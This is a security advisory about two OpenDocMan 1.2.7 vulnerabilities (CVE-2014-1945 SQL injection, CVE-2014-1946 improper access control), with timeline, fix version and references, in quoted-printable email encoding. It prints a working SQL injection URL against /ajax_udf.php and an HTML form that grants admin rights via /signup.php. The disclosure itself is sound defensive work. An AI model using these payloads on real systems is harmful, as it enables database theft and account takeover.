Advisory ID: HTB23202 Product: OpenDocMan Vendor: Free Document Management Software Vulnerable Version(s): 1.2.7 and probably prior Tested Version: 1.2.7 Advisory Publication: February 12, 2014 [without technical details] Vendor Notification: February 12, 2014=20 Vendor Patch: February 24, 2014=20 Public Disclosure: March 5, 2014=20 Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-28= 4] CVE References: CVE-2014-1945, CVE-2014-1946 Risk Level: High=20 CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C= :P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities = in OpenDocMan, which can be exploited to perform SQL Injection and gain adm= inistrative access to the application. 1) SQL Injection in OpenDocMan: CVE-2014-1945 The vulnerability exists due to insufficient validation of "add_value" HTTP= GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker= can execute arbitrary SQL commands in application's database. The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=3D1&add_value=3Dodm_user%20UNION%20SELECT%201,= version%28%29,3,4,5,6,7,8,9 2) Improper Access Control in OpenDocMan: CVE-2014-1946 The vulnerability exists due to insufficient validation of allowed action i= n "/signup.php" script when updating user=E2=80=99s profile. A remote authe= nticated attacker can assign administrative privileges to the current accou= nt and gain complete control over the application. The exploitation example below assigns administrative privileges for the cu= rrent account: <form action=3D"http://[host]/signup.php" method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"updateuser" value=3D"1"> <input type=3D"hidden" name=3D"admin" value=3D"1"> <input type=3D"hidden" name=3D"id" value=3D"[USER_ID]"> <input type=3D"submit" name=3D"login" value=3D"Run"> </form> ---------------------------------------------------------------------------= -------------------- Solution: Update to OpenDocMan v1.2.7.2 More Information: http://www.opendocman.com/opendocman-v1-2-7-1-release/ http://www.opendocman.com/opendocman-v1-2-7-2-released/ ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/= HTB23202 - Multiple vulnerabilities in OpenDocMan. [2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Manageme= nt System written in PHP. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - http://www.htbridge.com/immuniweb/ - is High-Tech Bri= dge's proprietary web application security assessment solution with SaaS de= livery model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.